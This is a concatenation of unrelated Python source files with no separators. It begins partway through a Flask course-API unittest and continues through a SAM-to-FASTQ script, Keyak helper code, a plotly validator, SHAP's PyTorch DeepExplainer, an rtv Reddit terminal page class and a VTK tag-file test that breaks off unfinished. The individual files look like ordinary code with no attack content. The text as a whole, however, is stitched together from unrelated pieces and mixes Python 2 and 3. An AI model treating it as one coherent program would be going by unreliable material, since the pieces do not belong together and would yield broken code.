        # Next check that by posting invalid JSON data we get status code 415
        invalid_json = "INVALID " + json.dumps(new_course)
        rv = self.app.post(resource_url, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,415)

        # Check that template structure is validated
        invalid_json = json.dumps(new_course['template'])
        rv = self.app.post(resource_url, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,400)

        # Check for the missing required field by removing the third row in array (course name)
        invalid_template = copy.deepcopy(new_course)
        invalid_template['template']['data'].pop(2)
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(invalid_template))
        self.assertEquals(rv.status_code,400)

        # Lastly, delete the item
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

    def test_course_put(self):
        '''
        Check that an existing course can be modified.
        '''
        print '(' + self.test_course_put.__name__ + ')', \
            self.test_course_put.__doc__

        resource_url = self.courselist_resource_url
        new_course = self.test_course_template_1
        edited_course =  self.test_course_template_2

        # First create the course
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,201)
        location = rv.location
        self.assertIsNotNone(location)

        # Then try to edit the course
        rv = self.app.put(location, headers=self.header_auth, data=json.dumps(edited_course))
        self.assertEquals(rv.status_code,200)
        location = rv.location
        self.assertIsNotNone(location)

        # Put returns the address of newly created resource URL in header, in 'location'. Get the identifier of
        # the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Fetch the item from database and set it to course_id_db, and convert the filled post template data above to
        # similar format by replacing the keys with post data attributes.
        course_in_db = db.get_course(new_id)
        course_posted = self._convert(edited_course)

        # Compare the data in database and the post template above.
        self.assertDictContainsSubset(course_posted, course_in_db)

        # Next check that by posting invalid JSON data we get status code 415
        invalid_json = "INVALID " + json.dumps(new_course)
        rv = self.app.put(location, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,415)

        # Check that template structure is validated
        invalid_json = json.dumps(new_course['template'])
        rv = self.app.put(location, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,400)

        # Lastly, we delete the course
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

    def test_course_delete(self):
        '''
        Check that course in not able to get course list without authenticating.
        '''
        print '(' + self.test_course_delete.__name__ + ')', \
            self.test_course_delete.__doc__

        # First create the course
        resource_url = self.courselist_resource_url
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(self.test_course_template_2))
        self.assertEquals(rv.status_code,201)
        location = rv.location
        self.assertIsNotNone(location)

        # Get the identifier of the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Then, we delete the course
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

        # Try to fetch the deleted course from database - expect to fail
        self.assertIsNone(db.get_course(new_id))

    def test_for_method_not_allowed(self):
        '''
        For inconsistency check for 405, method not allowed.
        '''

        print '(' + self.test_course_get.__name__ + ')', \
            self.test_course_get.__doc__

        # CourseList/PUT should not exist
        rv = self.app.put(self.courselist_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

        # CourseList/DELETE should not exist
        rv = self.app.delete(self.courselist_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

        # Course/POST should not exist
        rv = self.app.post(self.course_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

    def _isIdentical(self, api_item, db_item):
        '''
        Check whether template data corresponds to data stored in the database.
        '''

        return api_item['courseId'] == db_item['course_id'] and \
               api_item['name'] == db_item['course_name'] and \
               api_item['archiveId'] == db_item['archive_id'] and \
               api_item['description'] == db_item['description'] and \
               api_item['inLanguage'] == db_item['language_id'] and \
               api_item['creditPoints'] == db_item['credit_points'] and \
               api_item['courseCode'] == db_item['course_code']

    def _convert(self, template_data):
        '''
        Convert template data to a dictionary representing the format the data is saved in the database.
        '''

        trans_table = {"name":"course_name", "url":"url", "archiveId":"archive_id", "courseCode":"course_code",
                       "dateModified": "modified_date", "modifierId":"modifier_id", "courseId":"course_id",
                       "description":"description", "inLanguage":"language_id", "creditPoints":"credit_points",
                       "teacherId":"teacher_id", "teacherName":"teacher_name"}
        data = self._create_dict(template_data['template']['data'])

        db_item = {}
        for key, val in data.items():
            db_item[trans_table[key]] = val

        return db_item

    def _create_dict(self,item):
        '''
        Create a dictionary from template data for easier handling.
        '''

        dict = {}
        for f in item:
            dict[f['name']] = f['value']

        return dict

if __name__ == '__main__':
    print 'Start running tests'
    unittest.main()

#!/usr/bin/env python2.7
import sys
for line in open(sys.argv[1]):
	cut=line.split('\t')
	if len(cut)<11: continue
	print ">"+cut[0]
	print cut[9]
	print "+"
	print cut[10]

# -*- coding: utf-8 -*-
# Keyak v2 implementation by Jos Wetzels and Wouter Bokslag
# hereby denoted as "the implementer".

# Based on Keccak Python and Keyak v2 C++ implementations
# by the Keccak, Keyak and Ketje Teams, namely, Guido Bertoni,
# Joan Daemen, Michaël Peeters, Gilles Van Assche and Ronny Van Keer
#
# For more information, feedback or questions, please refer to:
# http://keyak.noekeon.org/
# http://keccak.noekeon.org/
# http://ketje.noekeon.org/

from StringIO import StringIO

class stringStream(StringIO):
	# Peek (extract byte without advancing position, return None if no more stream is available)
	def peek(self):
		oldPos = self.tell()
		b = self.read(1)
		newPos = self.tell()
		if((newPos == (oldPos+1)) and (b != '')):
			r = ord(b)
		else:
			r = None

		self.seek(oldPos, 0)
		return r

	# Pop a single byte (as integer representation)
	def get(self):
		return ord(self.read(1))

	# Push a single byte (as integer representation)
	def put(self, b):
		self.write(chr(b))
		return

	# Erase buffered contents
	def erase(self):
		self.truncate(0)
		self.seek(0, 0)
		return

	# Set buffered contents
	def setvalue(self, s):
		self.erase()
		self.write(s)
		return

def hasMore(I):
	return (I.peek() != None)

def enc8(x):
	if (x > 255):
		raise Exception("The integer %d cannot be encoded on 8 bits." % x)
	else:
		return x

# Constant-time comparison from the Django source: https://github.com/django/django/blob/master/django/utils/crypto.py
# Is constant-time only if both strings are of equal length but given the use-case that is always the case.
def constant_time_compare(val1, val2):
    if len(val1) != len(val2):
        return False
    result = 0
    for x, y in zip(val1, val2):
        result |= ord(x) ^ ord(y)
    return result == 0
import _plotly_utils.basevalidators


class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
    def __init__(
        self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
    ):
        super(BordercolorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            array_ok=kwargs.pop("array_ok", True),
            edit_type=kwargs.pop("edit_type", "calc"),
            **kwargs
        )

import numpy as np
import warnings
from .._explainer import Explainer
from packaging import version
torch = None


class PyTorchDeep(Explainer):

    def __init__(self, model, data):
        # try and import pytorch
        global torch
        if torch is None:
            import torch
            if version.parse(torch.__version__) < version.parse("0.4"):
                warnings.warn("Your PyTorch version is older than 0.4 and not supported.")

        # check if we have multiple inputs
        self.multi_input = False
        if type(data) == list:
            self.multi_input = True
        if type(data) != list:
            data = [data]
        self.data = data
        self.layer = None
        self.input_handle = None
        self.interim = False
        self.interim_inputs_shape = None
        self.expected_value = None  # to keep the DeepExplainer base happy
        if type(model) == tuple:
            self.interim = True
            model, layer = model
            model = model.eval()
            self.layer = layer
            self.add_target_handle(self.layer)

            # if we are taking an interim layer, the 'data' is going to be the input
            # of the interim layer; we will capture this using a forward hook
            with torch.no_grad():
                _ = model(*data)
                interim_inputs = self.layer.target_input
                if type(interim_inputs) is tuple:
                    # this should always be true, but just to be safe
                    self.interim_inputs_shape = [i.shape for i in interim_inputs]
                else:
                    self.interim_inputs_shape = [interim_inputs.shape]
            self.target_handle.remove()
            del self.layer.target_input
        self.model = model.eval()

        self.multi_output = False
        self.num_outputs = 1
        with torch.no_grad():
            outputs = model(*data)

            # also get the device everything is running on
            self.device = outputs.device
            if outputs.shape[1] > 1:
                self.multi_output = True
                self.num_outputs = outputs.shape[1]
            self.expected_value = outputs.mean(0).cpu().numpy()

    def add_target_handle(self, layer):
        input_handle = layer.register_forward_hook(get_target_input)
        self.target_handle = input_handle

    def add_handles(self, model, forward_handle, backward_handle):
        """
        Add handles to all non-container layers in the model.
        Recursively for non-container layers
        """
        handles_list = []
        model_children = list(model.children())
        if model_children:
            for child in model_children:
                handles_list.extend(self.add_handles(child, forward_handle, backward_handle))
        else:  # leaves
            handles_list.append(model.register_forward_hook(forward_handle))
            handles_list.append(model.register_backward_hook(backward_handle))
        return handles_list

    def remove_attributes(self, model):
        """
        Removes the x and y attributes which were added by the forward handles
        Recursively searches for non-container layers
        """
        for child in model.children():
            if 'nn.modules.container' in str(type(child)):
                self.remove_attributes(child)
            else:
                try:
                    del child.x
                except AttributeError:
                    pass
                try:
                    del child.y
                except AttributeError:
                    pass

    def gradient(self, idx, inputs):
        self.model.zero_grad()
        X = [x.requires_grad_() for x in inputs]
        outputs = self.model(*X)
        selected = [val for val in outputs[:, idx]]
        grads = []
        if self.interim:
            interim_inputs = self.layer.target_input
            for idx, input in enumerate(interim_inputs):
                grad = torch.autograd.grad(selected, input,
                                           retain_graph=True if idx + 1 < len(interim_inputs) else None,
                                           allow_unused=True)[0]
                if grad is not None:
                    grad = grad.cpu().numpy()
                else:
                    grad = torch.zeros_like(X[idx]).cpu().numpy()
                grads.append(grad)
            del self.layer.target_input
            return grads, [i.detach().cpu().numpy() for i in interim_inputs]
        else:
            for idx, x in enumerate(X):
                grad = torch.autograd.grad(selected, x,
                                           retain_graph=True if idx + 1 < len(X) else None,
                                           allow_unused=True)[0]
                if grad is not None:
                    grad = grad.cpu().numpy()
                else:
                    grad = torch.zeros_like(X[idx]).cpu().numpy()
                grads.append(grad)
            return grads

    def shap_values(self, X, ranked_outputs=None, output_rank_order="max", check_additivity=False):

        # X ~ self.model_input
        # X_data ~ self.data

        # check if we have multiple inputs
        if not self.multi_input:
            assert type(X) != list, "Expected a single tensor model input!"
            X = [X]
        else:
            assert type(X) == list, "Expected a list of model inputs!"

        X = [x.detach().to(self.device) for x in X]

        if ranked_outputs is not None and self.multi_output:
            with torch.no_grad():
                model_output_values = self.model(*X)
            # rank and determine the model outputs that we will explain
            if output_rank_order == "max":
                _, model_output_ranks = torch.sort(model_output_values, descending=True)
            elif output_rank_order == "min":
                _, model_output_ranks = torch.sort(model_output_values, descending=False)
            elif output_rank_order == "max_abs":
                _, model_output_ranks = torch.sort(torch.abs(model_output_values), descending=True)
            else:
                assert False, "output_rank_order must be max, min, or max_abs!"
            model_output_ranks = model_output_ranks[:, :ranked_outputs]
        else:
            model_output_ranks = (torch.ones((X[0].shape[0], self.num_outputs)).int() *
                                  torch.arange(0, self.num_outputs).int())

        # add the gradient handles
        handles = self.add_handles(self.model, add_interim_values, deeplift_grad)
        if self.interim:
            self.add_target_handle(self.layer)

        # compute the attributions
        output_phis = []
        for i in range(model_output_ranks.shape[1]):
            phis = []
            if self.interim:
                for k in range(len(self.interim_inputs_shape)):
                    phis.append(np.zeros((X[0].shape[0], ) + self.interim_inputs_shape[k][1: ]))
            else:
                for k in range(len(X)):
                    phis.append(np.zeros(X[k].shape))
            for j in range(X[0].shape[0]):
                # tile the inputs to line up with the background data samples
                tiled_X = [X[l][j:j + 1].repeat(
                                   (self.data[l].shape[0],) + tuple([1 for k in range(len(X[l].shape) - 1)])) for l
                           in range(len(X))]
                joint_x = [torch.cat((tiled_X[l], self.data[l]), dim=0) for l in range(len(X))]
                # run attribution computation graph
                feature_ind = model_output_ranks[j, i]
                sample_phis = self.gradient(feature_ind, joint_x)
                # assign the attributions to the right part of the output arrays
                if self.interim:
                    sample_phis, output = sample_phis
                    x, data = [], []
                    for k in range(len(output)):
                        x_temp, data_temp = np.split(output[k], 2)
                        x.append(x_temp)
                        data.append(data_temp)
                    for l in range(len(self.interim_inputs_shape)):
                        phis[l][j] = (sample_phis[l][self.data[l].shape[0]:] * (x[l] - data[l])).mean(0)
                else:
                    for l in range(len(X)):
                        phis[l][j] = (torch.from_numpy(sample_phis[l][self.data[l].shape[0]:]).to(self.device) * (X[l][j: j + 1] - self.data[l])).cpu().detach().numpy().mean(0)
            output_phis.append(phis[0] if not self.multi_input else phis)
        # cleanup; remove all gradient handles
        for handle in handles:
            handle.remove()
        self.remove_attributes(self.model)
        if self.interim:
            self.target_handle.remove()

        if not self.multi_output:
            return output_phis[0]
        elif ranked_outputs is not None:
            return output_phis, model_output_ranks
        else:
            return output_phis

# Module hooks


def deeplift_grad(module, grad_input, grad_output):
    """The backward hook which computes the deeplift
    gradient for an nn.Module
    """
    # first, get the module type
    module_type = module.__class__.__name__
    # first, check the module is supported
    if module_type in op_handler:
        if op_handler[module_type].__name__ not in ['passthrough', 'linear_1d']:
            return op_handler[module_type](module, grad_input, grad_output)
    else:
        print('Warning: unrecognized nn.Module: {}'.format(module_type))
        return grad_input


def add_interim_values(module, input, output):
    """The forward hook used to save interim tensors, detached
    from the graph. Used to calculate the multipliers
    """
    try:
        del module.x
    except AttributeError:
        pass
    try:
        del module.y
    except AttributeError:
        pass
    module_type = module.__class__.__name__
    if module_type in op_handler:
        func_name = op_handler[module_type].__name__
        # First, check for cases where we don't need to save the x and y tensors
        if func_name == 'passthrough':
            pass
        else:
            # check only the 0th input varies
            for i in range(len(input)):
                if i != 0 and type(output) is tuple:
                    assert input[i] == output[i], "Only the 0th input may vary!"
            # if a new method is added, it must be added here too. This ensures tensors
            # are only saved if necessary
            if func_name in ['maxpool', 'nonlinear_1d']:
                # only save tensors if necessary
                if type(input) is tuple:
                    setattr(module, 'x', torch.nn.Parameter(input[0].detach()))
                else:
                    setattr(module, 'x', torch.nn.Parameter(input.detach()))
                if type(output) is tuple:
                    setattr(module, 'y', torch.nn.Parameter(output[0].detach()))
                else:
                    setattr(module, 'y', torch.nn.Parameter(output.detach()))
            if module_type in failure_case_modules:
                input[0].register_hook(deeplift_tensor_grad)


def get_target_input(module, input, output):
    """A forward hook which saves the tensor - attached to its graph.
    Used if we want to explain the interim outputs of a model
    """
    try:
        del module.target_input
    except AttributeError:
        pass
    setattr(module, 'target_input', input)

# From the documentation: "The current implementation will not have the presented behavior for
# complex Module that perform many operations. In some failure cases, grad_input and grad_output
# will only contain the gradients for a subset of the inputs and outputs.
# The tensor hook below handles such failure cases (currently, MaxPool1d). In such cases, the deeplift
# grad should still be computed, and then appended to the complex_model_gradients list. The tensor hook
# will then retrieve the proper gradient from this list.


failure_case_modules = ['MaxPool1d']


def deeplift_tensor_grad(grad):
    return_grad = complex_module_gradients[-1]
    del complex_module_gradients[-1]
    return return_grad


complex_module_gradients = []


def passthrough(module, grad_input, grad_output):
    """No change made to gradients"""
    return None


def maxpool(module, grad_input, grad_output):
    pool_to_unpool = {
        'MaxPool1d': torch.nn.functional.max_unpool1d,
        'MaxPool2d': torch.nn.functional.max_unpool2d,
        'MaxPool3d': torch.nn.functional.max_unpool3d
    }
    pool_to_function = {
        'MaxPool1d': torch.nn.functional.max_pool1d,
        'MaxPool2d': torch.nn.functional.max_pool2d,
        'MaxPool3d': torch.nn.functional.max_pool3d
    }
    delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]
    dup0 = [2] + [1 for i in delta_in.shape[1:]]
    # we also need to check if the output is a tuple
    y, ref_output = torch.chunk(module.y, 2)
    cross_max = torch.max(y, ref_output)
    diffs = torch.cat([cross_max - ref_output, y - cross_max], 0)

    # all of this just to unpool the outputs
    with torch.no_grad():
        _, indices = pool_to_function[module.__class__.__name__](
            module.x, module.kernel_size, module.stride, module.padding,
            module.dilation, module.ceil_mode, True)
        xmax_pos, rmax_pos = torch.chunk(pool_to_unpool[module.__class__.__name__](
            grad_output[0] * diffs, indices, module.kernel_size, module.stride,
            module.padding, list(module.x.shape)), 2)
    org_input_shape = grad_input[0].shape  # for the maxpool 1d
    grad_input = [None for _ in grad_input]
    grad_input[0] = torch.where(torch.abs(delta_in) < 1e-7, torch.zeros_like(delta_in),
                           (xmax_pos + rmax_pos) / delta_in).repeat(dup0)
    if module.__class__.__name__ == 'MaxPool1d':
        complex_module_gradients.append(grad_input[0])
        # the grad input that is returned doesn't matter, since it will immediately be
        # be overridden by the grad in the complex_module_gradient
        grad_input[0] = torch.ones(org_input_shape)
    return tuple(grad_input)


def linear_1d(module, grad_input, grad_output):
    """No change made to gradients."""
    return None


def nonlinear_1d(module, grad_input, grad_output):
    delta_out = module.y[: int(module.y.shape[0] / 2)] - module.y[int(module.y.shape[0] / 2):]

    delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]
    dup0 = [2] + [1 for i in delta_in.shape[1:]]
    # handles numerical instabilities where delta_in is very small by
    # just taking the gradient in those cases
    grads = [None for _ in grad_input]
    grads[0] = torch.where(torch.abs(delta_in.repeat(dup0)) < 1e-6, grad_input[0],
                           grad_output[0] * (delta_out / delta_in).repeat(dup0))
    return tuple(grads)


op_handler = {}

# passthrough ops, where we make no change to the gradient
op_handler['Dropout3d'] = passthrough
op_handler['Dropout2d'] = passthrough
op_handler['Dropout'] = passthrough
op_handler['AlphaDropout'] = passthrough

op_handler['Conv1d'] = linear_1d
op_handler['Conv2d'] = linear_1d
op_handler['Conv3d'] = linear_1d
op_handler['ConvTranspose1d'] = linear_1d
op_handler['ConvTranspose2d'] = linear_1d
op_handler['ConvTranspose3d'] = linear_1d
op_handler['Linear'] = linear_1d
op_handler['AvgPool1d'] = linear_1d
op_handler['AvgPool2d'] = linear_1d
op_handler['AvgPool3d'] = linear_1d
op_handler['AdaptiveAvgPool1d'] = linear_1d
op_handler['AdaptiveAvgPool2d'] = linear_1d
op_handler['AdaptiveAvgPool3d'] = linear_1d
op_handler['BatchNorm1d'] = linear_1d
op_handler['BatchNorm2d'] = linear_1d
op_handler['BatchNorm3d'] = linear_1d

op_handler['LeakyReLU'] = nonlinear_1d
op_handler['ReLU'] = nonlinear_1d
op_handler['ELU'] = nonlinear_1d
op_handler['Sigmoid'] = nonlinear_1d
op_handler["Tanh"] = nonlinear_1d
op_handler["Softplus"] = nonlinear_1d
op_handler['Softmax'] = nonlinear_1d

op_handler['MaxPool1d'] = maxpool
op_handler['MaxPool2d'] = maxpool
op_handler['MaxPool3d'] = maxpool

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import time
import curses

from . import docs
from .content import SubmissionContent, SubredditContent
from .page import Page, PageController, logged_in
from .objects import Navigator, Color, Command
from .exceptions import TemporaryFileError


class SubmissionController(PageController):
    character_map = {}


class SubmissionPage(Page):

    FOOTER = docs.FOOTER_SUBMISSION

    def __init__(self, reddit, term, config, oauth, url=None, submission=None):
        super(SubmissionPage, self).__init__(reddit, term, config, oauth)

        self.controller = SubmissionController(self, keymap=config.keymap)

        if url:
            self.content = SubmissionContent.from_url(
                reddit, url, term.loader,
                max_comment_cols=config['max_comment_cols'])
        else:
            self.content = SubmissionContent(
                submission, term.loader,
                max_comment_cols=config['max_comment_cols'])
        # Start at the submission post, which is indexed as -1
        self.nav = Navigator(self.content.get, page_index=-1)
        self.selected_subreddit = None

    @SubmissionController.register(Command('SUBMISSION_TOGGLE_COMMENT'))
    def toggle_comment(self):
        "Toggle the selected comment tree between visible and hidden"

        current_index = self.nav.absolute_index
        self.content.toggle(current_index)

        # This logic handles a display edge case after a comment toggle. We
        # want to make sure that when we re-draw the page, the cursor stays at
        # its current absolute position on the screen. In order to do this,
        # apply a fixed offset if, while inverted, we either try to hide the
        # bottom comment or toggle any of the middle comments.
        if self.nav.inverted:
            data = self.content.get(current_index)
            if data['hidden'] or self.nav.cursor_index != 0:
                window = self._subwindows[-1][0]
                n_rows, _ = window.getmaxyx()
                self.nav.flip(len(self._subwindows) - 1)
                self.nav.top_item_height = n_rows

    @SubmissionController.register(Command('SUBMISSION_EXIT'))
    def exit_submission(self):
        "Close the submission and return to the subreddit page"

        self.active = False

    @SubmissionController.register(Command('REFRESH'))
    def refresh_content(self, order=None, name=None):
        "Re-download comments and reset the page index"

        order = order or self.content.order
        url = name or self.content.name

        with self.term.loader('Refreshing page'):
            self.content = SubmissionContent.from_url(
                self.reddit, url, self.term.loader, order=order,
                max_comment_cols=self.config['max_comment_cols'])
        if not self.term.loader.exception:
            self.nav = Navigator(self.content.get, page_index=-1)

    @SubmissionController.register(Command('PROMPT'))
    def prompt_subreddit(self):
        "Open a prompt to navigate to a different subreddit"

        name = self.term.prompt_input('Enter page: /')
        if name is not None:
            with self.term.loader('Loading page'):
                content = SubredditContent.from_name(
                    self.reddit, name, self.term.loader)
            if not self.term.loader.exception:
                self.selected_subreddit = content
                self.active = False

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_BROWSER'))
    def open_link(self):
        "Open the selected item with the webbrowser"

        data = self.get_selected_item()
        url = data.get('permalink')
        if url:
            self.term.open_browser(url)
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_PAGER'))
    def open_pager(self):
        "Open the selected item with the system's pager"
        data = self.get_selected_item()
        if data['type'] == 'Submission':
            text = '\n\n'.join((data['permalink'], data['text']))
            self.term.open_pager(text)
        elif data['type'] == 'Comment':
            text = '\n\n'.join((data['permalink'], data['body']))
            self.term.open_pager(text)
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_POST'))
    @logged_in
    def add_comment(self):
        """
        Submit a reply to the selected item.

        Selected item:
            Submission - add a top level comment
            Comment - add a comment reply
        """

        data = self.get_selected_item()
        if data['type'] == 'Submission':
            body = data['text']
            reply = data['object'].add_comment
        elif data['type'] == 'Comment':
            body = data['body']
            reply = data['object'].reply
        else:
            self.term.flash()
            return

        # Construct the text that will be displayed in the editor file.
        # The post body will be commented out and added for reference
        lines = ['#  |' + line for line in body.split('\n')]
        content = '\n'.join(lines)
        comment_info = docs.COMMENT_FILE.format(
            author=data['author'],
            type=data['type'].lower(),
            content=content)

        with self.term.open_editor(comment_info) as comment:
            if not comment:
                self.term.show_notification('Canceled')
                return

            with self.term.loader('Posting', delay=0):
                reply(comment)
                # Give reddit time to process the submission
                time.sleep(2.0)

            if self.term.loader.exception is None:
                self.refresh_content()
            else:
                raise TemporaryFileError()

    @SubmissionController.register(Command('DELETE'))
    @logged_in
    def delete_comment(self):
        "Delete the selected comment"

        if self.get_selected_item()['type'] == 'Comment':
            self.delete_item()
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_URLVIEWER'))
    def comment_urlview(self):
        data = self.get_selected_item()
        comment = data.get('body') or data.get('text') or data.get('url_full')
        if comment:
            self.term.open_urlview(comment)
        else:
            self.term.flash()

    def _draw_item(self, win, data, inverted):

        if data['type'] == 'MoreComments':
            return self._draw_more_comments(win, data)
        elif data['type'] == 'HiddenComment':
            return self._draw_more_comments(win, data)
        elif data['type'] == 'Comment':
            return self._draw_comment(win, data, inverted)
        else:
            return self._draw_submission(win, data)

    def _draw_comment(self, win, data, inverted):

        n_rows, n_cols = win.getmaxyx()
        n_cols -= 1

        # Handle the case where the window is not large enough to fit the text.
        valid_rows = range(0, n_rows)
        offset = 0 if not inverted else -(data['n_rows'] - n_rows)

        # If there isn't enough space to fit the comment body on the screen,
        # replace the last line with a notification.
        split_body = data['split_body']
        if data['n_rows'] > n_rows:
            # Only when there is a single comment on the page and not inverted
            if not inverted and len(self._subwindows) == 0:
                cutoff = data['n_rows'] - n_rows + 1
                split_body = split_body[:-cutoff]
                split_body.append('(Not enough space to display)')

        row = offset
        if row in valid_rows:

            attr = curses.A_BOLD
            attr |= (Color.BLUE if not data['is_author'] else Color.GREEN)
            self.term.add_line(win, '{author} '.format(**data), row, 1, attr)

            if data['flair']:
                attr = curses.A_BOLD | Color.YELLOW
                self.term.add_line(win, '{flair} '.format(**data), attr=attr)

            text, attr = self.term.get_arrow(data['likes'])
            self.term.add_line(win, text, attr=attr)
            self.term.add_line(win, ' {score} {created} '.format(**data))

            if data['gold']:
                text, attr = self.term.guilded
                self.term.add_line(win, text, attr=attr)

            if data['stickied']:
                text, attr = '[stickied]', Color.GREEN
                self.term.add_line(win, text, attr=attr)

            if data['saved']:
                text, attr = '[saved]', Color.GREEN
                self.term.add_line(win, text, attr=attr)

        for row, text in enumerate(split_body, start=offset+1):
            if row in valid_rows:
                self.term.add_line(win, text, row, 1)

        # Unfortunately vline() doesn't support custom color so we have to
        # build it one segment at a time.
        attr = Color.get_level(data['level'])
        x = 0
        for y in range(n_rows):
            self.term.addch(win, y, x, self.term.vline, attr)

        return attr | self.term.vline

    def _draw_more_comments(self, win, data):

        n_rows, n_cols = win.getmaxyx()
        n_cols -= 1

        self.term.add_line(win, '{body}'.format(**data), 0, 1)
        self.term.add_line(
            win, ' [{count}]'.format(**data), attr=curses.A_BOLD)

        attr = Color.get_level(data['level'])
        self.term.addch(win, 0, 0, self.term.vline, attr)

        return attr | self.term.vline

    def _draw_submission(self, win, data):

        n_rows, n_cols = win.getmaxyx()
        n_cols -= 3  # one for each side of the border + one for offset

        for row, text in enumerate(data['split_title'], start=1):
            self.term.add_line(win, text, row, 1, curses.A_BOLD)

        row = len(data['split_title']) + 1
        attr = curses.A_BOLD | Color.GREEN
        self.term.add_line(win, '{author}'.format(**data), row, 1, attr)
        attr = curses.A_BOLD | Color.YELLOW
        if data['flair']:
            self.term.add_line(win, ' {flair}'.format(**data), attr=attr)
        self.term.add_line(win, ' {created} {subreddit}'.format(**data))

        row = len(data['split_title']) + 2
        attr = curses.A_UNDERLINE | Color.BLUE
        self.term.add_line(win, '{url}'.format(**data), row, 1, attr)
        offset = len(data['split_title']) + 3

        # Cut off text if there is not enough room to display the whole post
        split_text = data['split_text']
        if data['n_rows'] > n_rows:
            cutoff = data['n_rows'] - n_rows + 1
            split_text = split_text[:-cutoff]
            split_text.append('(Not enough space to display)')

        for row, text in enumerate(split_text, start=offset):
            self.term.add_line(win, text, row, 1)

        row = len(data['split_title']) + len(split_text) + 3
        self.term.add_line(win, '{score} '.format(**data), row, 1)
        text, attr = self.term.get_arrow(data['likes'])
        self.term.add_line(win, text, attr=attr)
        self.term.add_line(win, ' {comments} '.format(**data))

        if data['gold']:
            text, attr = self.term.guilded
            self.term.add_line(win, text, attr=attr)

        if data['nsfw']:
            text, attr = 'NSFW', (curses.A_BOLD | Color.RED)
            self.term.add_line(win, text, attr=attr)

        if data['saved']:
            text, attr = '[saved]', Color.GREEN
            self.term.add_line(win, text, attr=attr)

        win.border()

#!/usr/bin/env python
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()

# Test label reading from an MNI tag file
#

# The current directory must be writeable.
#
try:
    fname = "mni-tagtest.tag"
    channel = open(fname, "wb")
    channel.close()

    # create some random points in a sphere
    #
    sphere1 = vtk.vtkPointSource()
    sphere1.SetNumberOfPoints(13)

    xform = vtk.vtkTransform()
    xform.RotateWXYZ(20, 1, 0, 0)

    xformFilter = vtk.vtkTransformFilter()
    xformFilter.SetTransform(xform)
    xformFilter.SetInputConnection(sphere1.GetOutputPort())

    labels = vtk.vtkStringArray()
    labels.InsertNextValue("0")
    labels.InsertNextValue("1")
    labels.InsertNextValue("2")
    labels.InsertNextValue("3")
    labels.InsertNextValue("Halifax")
    labels.InsertNextValue("Toronto")
    labels.InsertNextValue("Vancouver")
    labels.InsertNextValue("Larry")
    labels.InsertNextValue("Bob")
    labels.InsertNextValue("Jackie")
    labels.InsertNextValue("10")
    labels.InsertNextValue("11")
    labels.InsertNextValue("12")

    weights = vtk.vtkDoubleArray()
    weights.InsertNextValue(1.0)
    weights.InsertNextValue(1.1)
    weights.InsertNextValue(1.2)
    weights.InsertNextValue(1.3)
    weights.InsertNextValue(1.4)
    weights.InsertNextValue(1.5)
    weights.InsertNextValue(1.6)
    weights.InsertNextValue(1.7)
    weights.InsertNextValue(1.8)
    weights.InsertNextValue(1.9)
    weights.InsertNextValue(0.9)
    weights.InsertNextValue(0.8)
    weights.InsertNextValue(0.7)

    writer = vtk.vtkMNITagPointWriter()
    writer.SetFileName(fname)
    writer.SetInputConnection(sphere1.GetOutputPort())
    writer.SetInputConnection(1, xformFilter.GetOutputPort())
    writer.SetLabelText(labels)
    writer.SetWeights(weights)
    writer.SetComments("Volume 1: sphere points\nVolume 2: transformed points")
    writer.Write()

    reader = vtk.vtkMNITagPointReader()
    reader.CanReadFile(fname)
    reader.SetFileName(fname)

    textProp = vtk.vtkTextProperty()
    textProp.SetFontSize(12)
    textProp.SetColor(1.0, 1.0, 0.5)

    labelHier = vtk.vtkPointSetToLabelHierarchy()
    labelHier.SetInputConnection(reader.GetOutputPort())
    labelHier.SetTextProperty(textProp)
    labelHier.SetLabelArrayName("LabelText")
    labelHier.SetMaximumDepth(15)
    labelHier.SetTargetLabelCount(12)

    labelMapper = vtk.vtkLabelPlacementMapper()
    labelMapper.SetInputConnection(labelHier.GetOutputPort())
    labelMapper.UseDepthBufferOff()
    labelMapper.SetShapeToRect()
    labelMapper.SetStyleToOutline()

    labelActor = vtk.vtkActor2D()
    labelActor.SetMapper(labelMapper)

    glyphSource = vtk.vtkSphereSource()
    glyphSource.SetRadius(0.01)

    glyph = vtk.vtkGlyph3D()
    glyph.SetSourceConnection(glyphSource.GetOutputPort())
    glyph.SetInputConnection(reader.GetOutputPort())

    mapper = vtk.vtkDataSetMapper()
    mapper.SetInputConnection(glyph.GetOutputPort())

    actor = vtk.vtkActor()
    actor.SetMapper(mapper)

    # Create rendering stuff
    ren1 = vtk.vtkRenderer()
    renWin = vtk.vtkRenderWindow()
    renWin.SetMultiSamples(0)
    renWin.AddRenderer(ren1)
